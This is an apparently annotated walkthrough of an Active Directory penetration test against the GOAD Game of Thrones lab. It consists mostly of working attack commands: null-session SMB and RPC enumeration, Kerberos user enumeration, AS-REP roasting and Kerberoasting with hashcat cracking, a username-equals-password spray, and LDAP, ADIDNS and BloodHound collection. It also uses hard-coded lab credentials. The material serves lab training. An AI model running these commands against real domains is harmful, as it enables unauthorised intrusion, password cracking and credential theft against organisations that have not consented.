1. Initial Network and Service Enumeration
# Full TCP port sweep of the lab hosts with version probes and the default
# script set. -Pn treats every target as up and skips ping discovery; -oA
# writes normal, grepable and XML output under the full_scan_goad prefix.
nmap -sV -sC -p- -Pn \
  -oA full_scan_goad \
  10.3.10.10-12,22-23
2. SMB Enumeration
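# Unauthenticated SMB / RPC enumeration against the NORTH domain controller.
dc=10.3.10.11

crackmapexec smb "$dc" --users      # user listing
crackmapexec smb "$dc" --pass-pol   # lockout threshold/window: read this before any spray
enum4linux "$dc"

# Null session with a "DOMAIN\" user string (domain, backslash, empty user).
# The original wrote it as "NORTH\" inside double quotes, where \" is an
# escaped quote and leaves the string unterminated; single quotes keep the
# backslash literal.
rpcclient -U 'NORTH\' "$dc" -N
net rpc group members 'Domain Users' -W 'NORTH' -I "$dc" -U '%'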
3. Generating a User List from Game of Thrones Cast Data
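# Build a first.last user list from the GoT cast page. A one-word name is
# emitted as-is; names with more than two words are truncated to the first two.
# -f makes curl fail on HTTP errors instead of piping an error page into grep,
# -S still reports that failure under -s, and -L follows redirects.
curl -fsSL https://www.hbo.com/game-of-thrones/cast-and-crew \
  | grep 'href="/game-of-thrones/cast-and-crew/' \
  | grep -o 'aria-label="[^"]*"' \
  | cut -d '"' -f 2 \
  | awk '{ if ($2 == "") { print tolower($1) } else { print tolower($1) "." tolower($2) } }' \
  > got_users.txt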
4. Kerberos User Enumeration
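# Credential-less Kerberos user enumeration: the KDC answers differently for
# a principal that exists and one that does not. Each host is queried with its
# own realm. 10.3.10.11 is winterfell (north.sevenkingdoms.local, per the
# adidnsdump/BloodHound lines further down), so the original third call, which
# named the essos.local realm for that host, was asking the wrong KDC about the
# wrong realm. On the DC these probes surface as 4768 events with failure codes.
krb_enum() {
  local realm=$1 dc=$2
  nmap -p 88 --script=krb5-enum-users \
    --script-args="krb5-enum-users.realm='${realm}',userdb=got_users.txt" "$dc"
}
krb_enum sevenkingdoms.local       10.3.10.10
krb_enum essos.local               10.3.10.12
krb_enum north.sevenkingdoms.local 10.3.10.11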
5. Authenticated and Guest/Anonymous SMB Enumeration
# User dump on the ESSOS DC with a known account, then a share sweep across the
# whole lab range with a throwaway username and empty password, to spot shares
# readable without valid credentials.
crackmapexec smb 10.3.10.12 \
  -d essos.local -u khal.drogo -p horse \
  --users
crackmapexec smb 10.3.10.10-23 \
  -u 'a' -p '' \
  --shares
6. AS-REP Roasting and Password Attacks
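# AS-REP roasting: ask for a TGT for every listed user without pre-auth;
# accounts with "Do not require Kerberos preauthentication" set return a
# crackable blob. -outputfile was missing, so the hash file consumed by hashcat
# below was never written; -dc-ip matches the Kerberoasting step and avoids a
# DNS dependency.
# NOTE(review): the list generated above is got_users.txt, not
# sevenkingdoms_users.txt — confirm which file is meant.
impacket-GetNPUsers north.sevenkingdoms.local/ -no-pass -dc-ip 10.3.10.11 \
  -usersfile sevenkingdoms_users.txt -outputfile arsephash

# Unpack rockyou once. Absolute paths throughout: the original 'cd' into the
# wordlist directory meant the relative 'arsephash' written above was looked
# up in /usr/share/wordlists and not found by hashcat. The guard lets the
# block be re-run after the archive is gone.
wordlist=/usr/share/wordlists/rockyou.txt
[[ -f "$wordlist" ]] || sudo gunzip "${wordlist}.gz"
sudo chown kali:kali "$wordlist"

# -m 18200 = Kerberos 5 AS-REP etype 23 (the format GetNPUsers emits by default)
hashcat -m 18200 arsephash "$wordlist"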
7. Broad Credential Spray
# Username-equals-password check. With --no-bruteforce CME pairs line N of the
# user file with line N of the password file instead of trying every
# combination, so each account sees a single attempt; compare that against the
# lockout threshold from --pass-pol before running it.
userlist=sevenkingdoms_users.txt
crackmapexec smb 10.3.10.11 --no-bruteforce -u "$userlist" -p "$userlist"
8. Full AD User Enumeration
# Full user listing over LDAP with the recovered account. -all returns every
# user, including disabled ones. No -dc-ip here, so the domain name must
# resolve from this host.
impacket-GetADUsers -all \
  'north.sevenkingdoms.local/brandon.stark:iseedeadpeople'
9. LDAP Enumeration
# Raw LDAP user queries against each of the three domains, bound as the NORTH
# user; only the host and base DN change between calls. -w puts the password
# on the command line (visible in ps and shell history); ldapsearch's -W
# (prompt) or -y <file> avoid that. Without -x ldapsearch negotiates a SASL
# bind — if it fails with "no mechanism available", add -x, bearing in mind
# a simple bind over plain ldap:// sends the password in clear.
bind_dn='brandon.stark@north.sevenkingdoms.local'
bind_pw='iseedeadpeople'
user_filter='(&(objectCategory=person)(objectClass=user))'

ldapsearch -H ldap://10.3.10.11 -D "$bind_dn" -w "$bind_pw" \
  -b 'DC=north,DC=sevenkingdoms,DC=local' "$user_filter" \
  | grep 'distinguishedName:'
ldapsearch -H ldap://10.3.10.12 -D "$bind_dn" -w "$bind_pw" \
  -b 'DC=essos,DC=local' "$user_filter"
ldapsearch -H ldap://10.3.10.10 -D "$bind_dn" -w "$bind_pw" \
  -b 'DC=sevenkingdoms,DC=local' "$user_filter"
10. Kerberoasting
# Request a service ticket for every SPN-bearing user and write the TGS
# hashes to a file (hashcat format by default). -dc-ip pins the KDC so the
# request does not depend on DNS.
impacket-GetUserSPNs -dc-ip 10.3.10.11 -request \
  -outputfile kerberoasting.hashes \
  'north.sevenkingdoms.local/brandon.stark:iseedeadpeople'
If your clock is off (Kerberos rejects requests when the client and DC clocks differ by more than a few minutes, reported as KRB_AP_ERR_SKEW):
# Kerberos tolerates only a small clock skew between client and KDC (5 minutes
# by default); sync against the DC itself rather than a public pool so both
# sides agree.
sudo apt install -y ntpdate
sudo ntpdate 10.3.10.11
Then rerun:
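# Rerun after the clock is synced. The original rerun dropped -outputfile, so
# the hashes only went to stdout and the hashcat step that follows had nothing
# to read; keep the output file consistent with the first attempt.
impacket-GetUserSPNs 'north.sevenkingdoms.local/brandon.stark:iseedeadpeople' \
  -dc-ip 10.3.10.11 -request -outputfile kerberoasting.hashes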
Crack the hashes:
# -m 13100 = Kerberos 5 TGS-REP etype 23; -a 0 is a straight wordlist run.
# --force ignores hashcat's environment warnings, so a degraded run can go
# unnoticed; drop it once the host has a working OpenCL/CUDA setup.
hashcat -a 0 -m 13100 --force \
  kerberoasting.hashes /usr/share/wordlists/rockyou.txt
11. Post-Roasting SMB Access
# Share sweep across the lab range with the credentials recovered from the
# Kerberoasting step.
crackmapexec smb 10.3.10.10-23 \
  -d north.sevenkingdoms.local -u jon.snow -p iknownothing \
  --shares
12. ADIDNS Enumeration
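# Enumerate the AD-integrated DNS zones over LDAP. The clone and install are
# chained so that a failed clone or cd does not leave 'pip install .' running
# against whatever directory the shell happens to be in (the original ran it
# unconditionally on its own line). This installs an unpinned checkout into
# the system interpreter (--break-system-packages overrides PEP 668); pin a
# reviewed commit, or use pipx/a venv, anywhere but a disposable lab VM.
git clone https://github.com/dirkjanm/adidnsdump \
  && cd adidnsdump \
  && pip install --break-system-packages .
adidnsdump -u 'north.sevenkingdoms.local\jon.snow' -p 'iknownothing' \
  winterfell.north.sevenkingdoms.local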
13. BloodHound Collection
# BloodHound collection for all three domains with the single NORTH account.
# The NORTH DC (10.3.10.11) serves as resolver for every run, so the other
# domains' names must be resolvable through it (presumably via forwarding —
# confirm if the sevenkingdoms/essos runs fail to resolve). -c All turns on
# every collector, including the session/local-admin ones that touch every
# domain-joined host, which is the noisiest option on the wire.
bh_collect() {
  local domain=$1 user=$2 dc=$3
  bloodhound-python --zip -c All \
    -d "$domain" -u "$user" -p iseedeadpeople \
    -dc "$dc" -gc "$dc" -ns 10.3.10.11
}
bh_collect north.sevenkingdoms.local brandon.stark                           winterfell.north.sevenkingdoms.local
bh_collect sevenkingdoms.local       brandon.stark@north.sevenkingdoms.local kingslanding.sevenkingdoms.local
bh_collect essos.local               brandon.stark@north.sevenkingdoms.local meereen.essos.local